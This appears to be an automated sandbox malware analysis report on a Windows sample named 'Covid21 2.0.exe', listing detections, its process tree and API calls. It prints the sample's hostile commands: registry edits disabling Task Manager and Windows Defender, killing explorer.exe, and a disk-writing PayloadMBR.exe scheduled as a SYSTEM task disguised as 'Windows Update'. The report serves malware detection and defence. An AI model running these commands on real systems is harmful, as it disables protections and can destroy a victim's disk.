Analysis Report Covid21 2.0.exe

Overview

General Information

Sample Name:Covid21 2.0.exe
Analysis ID:377010
MD5:a7c7f5e792809db8653a75c958f82bc4
SHA1:7ebe75db24af98efdcfebd970e7eea4b029f9f81
SHA256:02fea9970500d498e602b22cea68ade9869aca40a5cdc79cf1798644ba2057ca

Detection

Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Command shell drops VBS files
Contains functionality to detect sleep reduction / modifications
Contains functionality to change the wallpaper
Disables the Windows task manager (taskmgr)
Found API chain indicative of debugger detection
Machine Learning detection for dropped file
Machine Learning detection for sample
Protects its processes via BreakOnTermination flag
Sample or dropped binary is a compiled AutoHotkey binary
Uses cmd line tools excessively to alter registry or file data
Uses schtasks.exe or at.exe to add and modify task schedules
Writes directly to the primary disk partition (DR0)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to detect sandboxes (mouse cursor move detection)
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
OS version to string mapping found (often used in BOTs)
PE file contains strange resources
Potential key logger detected (key state polling based)
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sleep loop found (likely to delay execution)
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Uses taskkill to terminate processes

Startup

  • System is w10x64
  • Covid21 2.0.exe (PID: 6564 cmdline: 'C:\Users\user\Desktop\Covid21 2.0.exe' MD5: A7C7F5E792809DB8653A75C958F82BC4)
    • cmd.exe (PID: 6616 cmdline: C:\Windows\system32\cmd.exe /c ''C:\Users\user\AppData\Local\Temp\2526.tmp\Covid21.bat' ' MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 6632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cscript.exe (PID: 6680 cmdline: cscript prompt.vbs MD5: 00D3041E47F99E48DD5FFFEDF60F6304)
      • reg.exe (PID: 6760 cmdline: REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 6780 cmdline: Reg add 'HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender' /v DisableAntiSpyware /t REG_DWORD /d 1 /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • CLWCP.exe (PID: 6804 cmdline: clwcp c:\covid21\covid.jpg MD5: E62EE6F1EFC85CB36D62AB779DB6E4EC)
      • reg.exe (PID: 6836 cmdline: reg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1 /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • wscript.exe (PID: 6888 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\2526.tmp\x.vbs' MD5: 7075DD7B9BE8807FCA93ACD86F724884)
      • cmd.exe (PID: 6912 cmdline: C:\Windows\system32\cmd.exe /K coronaloop.bat MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 6940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • Corona.exe (PID: 6984 cmdline: c:\covid21\corona.exe MD5: 6374CA8AD59246DFED4794FD788D6560)
      • timeout.exe (PID: 6932 cmdline: timeout 5 /nobreak MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
      • inv.exe (PID: 7092 cmdline: inv.exe MD5: EBB811D0396C06A70FE74D9B23679446)
      • wscript.exe (PID: 7104 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\2526.tmp\y.vbs' MD5: 7075DD7B9BE8807FCA93ACD86F724884)
      • timeout.exe (PID: 7120 cmdline: timeout 5 /nobreak MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
      • z.exe (PID: 6544 cmdline: z.exe MD5: A7CE5BEE03C197F0A99427C4B590F4A0)
      • wscript.exe (PID: 744 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\2526.tmp\y.vbs' MD5: 7075DD7B9BE8807FCA93ACD86F724884)
      • timeout.exe (PID: 768 cmdline: timeout 5 /nobreak MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
      • mlt.exe (PID: 6804 cmdline: mlt.exe MD5: A4E26D32F9655DBE8EFD276A530EB02B)
      • wscript.exe (PID: 3136 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\2526.tmp\y.vbs' MD5: 7075DD7B9BE8807FCA93ACD86F724884)
      • timeout.exe (PID: 1376 cmdline: timeout 5 /nobreak MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
      • wscript.exe (PID: 5972 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\2526.tmp\y.vbs' MD5: 7075DD7B9BE8807FCA93ACD86F724884)
      • icons.exe (PID: 6056 cmdline: icons.exe MD5: 3CA1D5768C2944D4284B1541653823C7)
        • conhost.exe (PID: 7060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • timeout.exe (PID: 7052 cmdline: timeout 5 /nobreak MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
      • screenscrew.exe (PID: 5600 cmdline: screenscrew.exe MD5: E87A04C270F98BB6B5677CC789D1AD1D)
      • wscript.exe (PID: 7080 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\2526.tmp\y.vbs' MD5: 7075DD7B9BE8807FCA93ACD86F724884)
      • timeout.exe (PID: 5672 cmdline: timeout 5 /nobreak MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
      • wscript.exe (PID: 6932 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\2526.tmp\t.vbs' MD5: 7075DD7B9BE8807FCA93ACD86F724884)
      • timeout.exe (PID: 3912 cmdline: timeout 3 /nobreak MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
      • taskkill.exe (PID: 6160 cmdline: taskkill /f /im explorer.exe MD5: 15E2E0ACD891510C6268CB8899F2A1A1)
      • PayloadMBR.exe (PID: 4112 cmdline: PayloadMBR.exe MD5: D917AF256A1D20B4EAC477CDB189367B)
        • schtasks.exe (PID: 4248 cmdline: schtasks.exe /Create /TN 'Windows Update' /ru SYSTEM /SC ONSTART /TR 'C:\Users\user\AppData\Local\Temp\2526.tmp\PayloadMBR.exe' MD5: 15FF7D8324231381BAD48A052F85DF04)
          • conhost.exe (PID: 4228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\PayloadMBR.exe | Avira: detection malicious, Label: HEUR/AGEN.1133501
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\PayloadMBR.exe | ReversingLabs: Detection: 82%
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\icons.exe | ReversingLabs: Detection: 12%
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\inv.exe | ReversingLabs: Detection: 48%
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\screenscrew.exe | Metadefender: Detection: 36%
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\screenscrew.exe | ReversingLabs: Detection: 62%
Multi AV Scanner detection for submitted file
Source: Covid21 2.0.exe | Virustotal: Detection: 69%
Source: Covid21 2.0.exe | Metadefender: Detection: 29%
Source: Covid21 2.0.exe | ReversingLabs: Detection: 75%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\icons.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\PayloadMBR.exe | Joe Sandbox ML: detected
Machine Learning detection for sample
Source: Covid21 2.0.exe | Joe Sandbox ML: detected
Source: 0.2.Covid21 2.0.exe.63145a.3.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: Covid21 2.0.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\CLWCP.exeCode function: 6_2_0040850C FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,6_2_0040850C
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\CLWCP.exeCode function: 6_2_00408604 FindFirstFileA,GetLastError,6_2_00408604
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\CLWCP.exeCode function: 6_2_00405210 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,6_2_00405210
Source: C:\covid21\Corona.exeCode function: 12_2_00404F24 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,12_2_00404F24
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\inv.exeCode function: 13_2_00404EB8 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,13_2_00404EB8
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\z.exeCode function: 18_2_0043892A _strlen,FindFirstFileA,FindFirstFileA,FindClose,FindFirstFileA,FindClose,_strcat,18_2_0043892A
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\z.exeCode function: 18_2_00424873 _strlen,_strcat,_strcat,_strrchr,_strlen,_strrchr,FindFirstFileA,FindFirstFileA,GetTickCount,PeekMessageA,GetTickCount,_strlen,_strcat,SetFileAttributesA,FindNextFileA,FindClose,_strcat,FindFirstFileA,_strlen,GetTickCount,GetTickCount,PeekMessageA,GetTickCount,_strlen,FindNextFileA,FindClose,18_2_00424873
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\z.exeCode function: 18_2_00423AD5 DeleteFileA,FindFirstFileA,_strcat,_strrchr,_strlen,GetTickCount,GetTickCount,PeekMessageA,GetTickCount,_strlen,_strcat,DeleteFileA,FindNextFileA,FindClose,18_2_00423AD5
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\z.exeCode function: 18_2_0040A357 _strrchr,_strcat,_strlen,_strcat,FindFirstFileA,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,_strcat,FindFirstFileA,_strlen,_strlen,FindNextFileA,FindClose,18_2_0040A357
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\z.exeCode function: 18_2_0042C368 FindFirstFileA,GetTickCount,GetTickCount,PeekMessageA,GetTickCount,_strlen,_strcat,MoveFileA,DeleteFileA,MoveFileA,CopyFileA,FindNextFileA,FindClose,18_2_0042C368
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\z.exeCode function: 18_2_00423D09 FindFirstFileA,FindClose,18_2_00423D09
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\z.exeCode function: 18_2_00423DE4 FindFirstFileA,FindClose,FileTimeToLocalFileTime,18_2_00423DE4
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\z.exeCode function: 18_2_00424DBB _strlen,_strcat,LocalFileTimeToFileTime,GetSystemTimeAsFileTime,_strcat,_strrchr,_strlen,_strrchr,FindFirstFileA,FindFirstFileA,SetFileTime,GetTickCount,PeekMessageA,GetTickCount,_strlen,_strcat,CreateFileA,SetFileTime,CloseHandle,FindNextFileA,FindClose,_strcat,FindFirstFileA,_strlen,GetTickCount,GetTickCount,PeekMessageA,GetTickCount,_strlen,FindNextFileA,FindClose,18_2_00424DBB
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\z.exeCode function: 18_2_0042C603 GetFileAttributesA,FindFirstFileA,FindClose,18_2_0042C603
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\z.exeCode function: 18_2_00439FDC FindFirstFileA,FindClose,GetFileAttributesA,18_2_00439FDC
Source: z.exe.0.dr | String found in binary or memory: http://www.autohotkey.com
Source: Covid21 2.0.exe, 00000000.00000002.754322945.0000000000611000.00000040.00020000.sdmp, z.exe, 00000012.00000002.792846873.000000000045A000.00000002.00020000.sdmp, z.exe.0.dr | String found in binary or memory: http://www.autohotkey.comCould
Source: screenscrew.exe, 0000001E.00000002.792044732.000000000043B000.00000004.00020000.sdmp | String found in binary or memory: http://www.rjlsoftware.com
Source: screenscrew.exe, 0000001E.00000002.793881577.00000000022C0000.00000004.00000001.sdmp | String found in binary or memory: http://www.rjlsoftware.com(
Source: screenscrew.exe | String found in binary or memory: http://www.rjlsoftware.com/?screenscrew
Source: screenscrew.exe, 0000001E.00000003.729503063.00000000021D0000.00000004.00000001.sdmp | String found in binary or memory: http://www.rjlsoftware.com/?screenscrewopenj
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\z.exeCode function: 18_2_00443AE3 GetTickCount,GetTickCount,OpenClipboard,OpenClipboard,GetTickCount,OpenClipboard,18_2_00443AE3
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\CLWCP.exeCode function: 6_2_004218AC GetClipboardData,CopyEnhMetaFileA,GetEnhMetaFileHeader,6_2_004218AC
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\z.exeCode function: 18_2_00420B07 GetForegroundWindow,GetWindowRect,_strrchr,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetDC,DeleteObject,DeleteObject,GetIconInfo,DeleteObject,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,ReleaseDC,DeleteObject,DeleteObject,SelectObject,DeleteDC,DeleteObject,18_2_00420B07
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\CLWCP.exeCode function: 6_2_00435EB4 GetKeyboardState,6_2_00435EB4
Source: Covid21 2.0.exe, 00000000.00000002.754644021.000000000090A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Source: C:\Users\user\Desktop\Covid21 2.0.exeCode function: 0_2_00405D3C GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetFocus,GetFocus,GetClassNameA,_strncoll,GetFocus,SendMessageA,GetPropA,0_2_00405D3C

Spam, unwanted Advertisements and Ransom Demands:

Contains functionality to change the wallpaper
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\CLWCP.exe | Code function: 6_2_0046CF80 RegOpenKeyExA,RegOpenKeyExA,RegSetValueExA,RegSetValueExA,RegSetValueExA,RegSetValueExA,RegFlushKey,RegCloseKey,SystemParametersInfoA,SystemParametersInfoA,6_2_0046CF80

Operating System Destruction:

Protects its processes via BreakOnTermination flag
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\PayloadMBR.exe | Process information set: 01 00 00 00

System Summary:

Sample or dropped binary is a compiled AutoHotkey binary
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\z.exe | Window found: window name: AutoHotkey
Source: C:\Users\user\Desktop\Covid21 2.0.exeCode function: 0_2_00404714 GetWindowLongA,CallWindowProcA,RemovePropA,RemovePropA,RemovePropA,RevokeDragDrop,SetWindowLongA,NtdllDefWindowProc_A,0_2_00404714
Source: C:\Users\user\Desktop\Covid21 2.0.exeCode function: 0_2_00407E1A sprintf,GetPropA,HeapFree,HeapFree,HeapFree,RemovePropA,CallWindowProcA,NtdllDefWindowProc_A,0_2_00407E1A
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\CLWCP.exeCode function: 6_2_00439164 NtdllDefWindowProc_A,GetCapture,6_2_00439164
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\CLWCP.exeCode function: 6_2_0045543C NtdllDefWindowProc_A,6_2_0045543C
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\CLWCP.exeCode function: 6_2_0042E49C NtdllDefWindowProc_A,6_2_0042E49C
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\CLWCP.exeCode function: 6_2_00449828 GetSubMenu,SaveDC,RestoreDC,72E7B080,SaveDC,RestoreDC,NtdllDefWindowProc_A,6_2_00449828
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\CLWCP.exeCode function: 6_2_00455BEC IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,6_2_00455BEC
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\CLWCP.exeCode function: 6_2_00455CB0 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,6_2_00455CB0
Source: C:\covid21\Corona.exeCode function: 12_2_00432908 NtdllDefWindowProc_A,GetCapture,KiUserCallbackDispatcher,12_2_00432908
Source: C:\covid21\Corona.exeCode function: 12_2_0044CEA8 NtdllDefWindowProc_A,12_2_0044CEA8
Source: C:\covid21\Corona.exeCode function: 12_2_004421FC GetSubMenu,SaveDC,RestoreDC,72E7B080,SaveDC,RestoreDC,NtdllDefWindowProc_A,12_2_004421FC
Source: C:\covid21\Corona.exeCode function: 12_2_0042738C NtdllDefWindowProc_A,12_2_0042738C
Source: C:\covid21\Corona.exeCode function: 12_2_0044D650 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,12_2_0044D650
Source: C:\covid21\Corona.exeCode function: 12_2_0044D700 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,12_2_0044D700
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\inv.exeCode function: 13_2_0044A410 NtdllDefWindowProc_A,13_2_0044A410
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\inv.exeCode function: 13_2_00424BF0 NtdllDefWindowProc_A,13_2_00424BF0
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\inv.exeCode function: 13_2_0044ABB8 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,13_2_0044ABB8
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\inv.exeCode function: 13_2_0044AC68 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,13_2_0044AC68
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\inv.exeCode function: 13_2_0043F764 GetSubMenu,SaveDC,RestoreDC,72E7B080,SaveDC,RestoreDC,NtdllDefWindowProc_A,13_2_0043F764
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\inv.exeCode function: 13_2_0042FFB8 NtdllDefWindowProc_A,GetCapture,13_2_0042FFB8
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\screenscrew.exeCode function: 30_2_00428F5C NtdllDefWindowProc_A,30_2_00428F5C
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\screenscrew.exeCode function: 30_2_0042220A NtdllDefWindowProc_A,30_2_0042220A
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\screenscrew.exeCode function: 30_2_00422218 NtdllDefWindowProc_A,30_2_00422218
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\screenscrew.exeCode function: 30_2_0042E808 NtdllDefWindowProc_A,30_2_0042E808
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\z.exeCode function: 18_2_004234E7: CreateFileA,DeviceIoControl,CreateFileA,DeviceIoControl,CloseHandle,18_2_004234E7
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\z.exeCode function: 18_2_0042CAA7 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,EnumWindows,ExitWindowsEx,18_2_0042CAA7
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\CLWCP.exe | File created: C:\Windows\clwcp.bmp
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\2526.tmp\CLWCP.exe 13B4EC59785A1B367EFB691A3D5C86EB5AAF1CA0062521C4782E1BAAC6633F8A
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\2526.tmp\PayloadMBR.exe E40F57F6693F4B817BEB50DE68027AABBB0376CA94A774F86E3833BAF93DC4C0
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\2526.tmp\icons.exe 4172C6120F8F98685698365D6DD52C80EB2080203CDDE479009BF8F4FA770AF0
Source: CLWCP.exe.0.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: CLWCP.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Corona.exe.0.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: Corona.exe.1.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: Covid21 2.0.exe, 00000000.00000002.754322945.0000000000611000.00000040.00020000.sdmpBinary or memory string: OriginalFilenamescreenscrew.exe: vs Covid21 2.0.exe
Source: Covid21 2.0.exe, 00000000.00000002.754322945.0000000000611000.00000040.00020000.sdmpBinary or memory string: OriginalFilename vs Covid21 2.0.exe
Source: Covid21 2.0.exe, 00000000.00000002.755160646.0000000000E50000.00000002.00000001.sdmpBinary or memory string: originalfilename vs Covid21 2.0.exe
Source: Covid21 2.0.exe, 00000000.00000002.755160646.0000000000E50000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs Covid21 2.0.exe
Source: Covid21 2.0.exe, 00000000.00000002.754831474.0000000000D50000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs Covid21 2.0.exe
Source: Covid21 2.0.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
Source: Covid21 2.0.exeStatic PE information: Section: UPX1 ZLIB complexity 0.999160245797
Source: classification engineClassification label: mal84.rans.evad.winEXE@73/19@0/0
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\CLWCP.exeCode function: 6_2_0041EC2C GetLastError,FormatMessageA,6_2_0041EC2C
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\z.exeCode function: 18_2_0042CAA7 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,EnumWindows,ExitWindowsEx,18_2_0042CAA7
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\CLWCP.exeCode function: 6_2_00408862 GetDiskFreeSpaceA,6_2_00408862
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\z.exeCode function: 18_2_0042B61C CoInitialize,CoCreateInstance,GetKeyboardLayout,MultiByteToWideChar,CoUninitialize,18_2_0042B61C
Source: C:\Users\user\Desktop\Covid21 2.0.exeCode function: 0_2_004020C9 FindResourceA,LoadResource,SizeofResource,0_2_004020C9
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4228:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7060:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6940:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6632:120:WilError_01
Source: C:\Users\user\Desktop\Covid21 2.0.exe | File created: C:\Users\user\AppData\Local\Temp\2526.tmp
Source: C:\Users\user\Desktop\Covid21 2.0.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\AppData\Local\Temp\2526.tmp\Covid21.bat' '
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cscript.exe cscript prompt.vbs
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\CLWCP.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\covid21\Corona.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\inv.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\screenscrew.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\PayloadMBR.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Windows\SysWOW64\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "explorer.exe")
Source: C:\Users\user\Desktop\Covid21 2.0.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\Covid21 2.0.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknownProcess created: C:\Users\user\Desktop\Covid21 2.0.exe 'C:\Users\user\Desktop\Covid21 2.0.exe'
Source: C:\Users\user\Desktop\Covid21 2.0.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\AppData\Local\Temp\2526.tmp\Covid21.bat' '
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cscript.exe cscript prompt.vbs
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe Reg add 'HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender' /v DisableAntiSpyware /t REG_DWORD /d 1 /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\2526.tmp\CLWCP.exe clwcp c:\covid21\covid.jpg
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1 /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\2526.tmp\x.vbs'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K coronaloop.bat
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout 5 /nobreak
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\covid21\Corona.exe c:\covid21\corona.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\2526.tmp\inv.exe inv.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\2526.tmp\y.vbs'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout 5 /nobreak
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\2526.tmp\z.exe z.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\2526.tmp\y.vbs'
